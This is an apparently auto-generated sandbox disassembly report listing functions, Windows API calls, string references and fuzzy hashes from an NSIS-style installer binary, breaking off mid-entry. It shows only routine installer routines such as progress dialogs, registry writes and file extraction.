Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE

Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
GetMessagePos.USER32 ref: 00404ADF
ScreenToClient.USER32(?,?), ref: 00404AF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31

Strings

f, xrefs: 00404B0D

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5

Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
wsprintfW.USER32 ref: 00402CD1
SetWindowTextW.USER32(?,?), ref: 00402CE1
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3

Strings

unpacking data: %d%%, xrefs: 00402CBF, 00402CCF
verifying installer: %d%%, xrefs: 00402CC6

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59

Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
wsprintfW.USER32 ref: 00404A70
SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83

Strings

%u.%u%s%s, xrefs: 00404A51
&B, xrefs: 00404A56

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$&B
API String ID: 3540041739-2907463167
Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8

Function 004061DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
CharNextW.USER32(?,?,?,00000000), ref: 0040624E
CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266

Strings

*?|<>/":, xrefs: 0040622E

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD

Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 0040252F
lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 00402536
WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568

Strings

8, xrefs: 0040250C

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8
API String ID: 1453599865-4194326291
Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D

Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
RegCloseKey.ADVAPI32(?), ref: 00402BE0
RegCloseKey.ADVAPI32(?), ref: 00402C05
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18

Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403192

Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69

CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5

WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9

Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405195
CallWindowProcW.USER32(?,?,?,?), ref: 004051E6

Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8

Strings

, xrefs: 00405176

Memory Dump Source

Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69

Function 00405BE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405C01
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C

Strings

nsa, xrefs: 00405BF0

Memory Dump Source

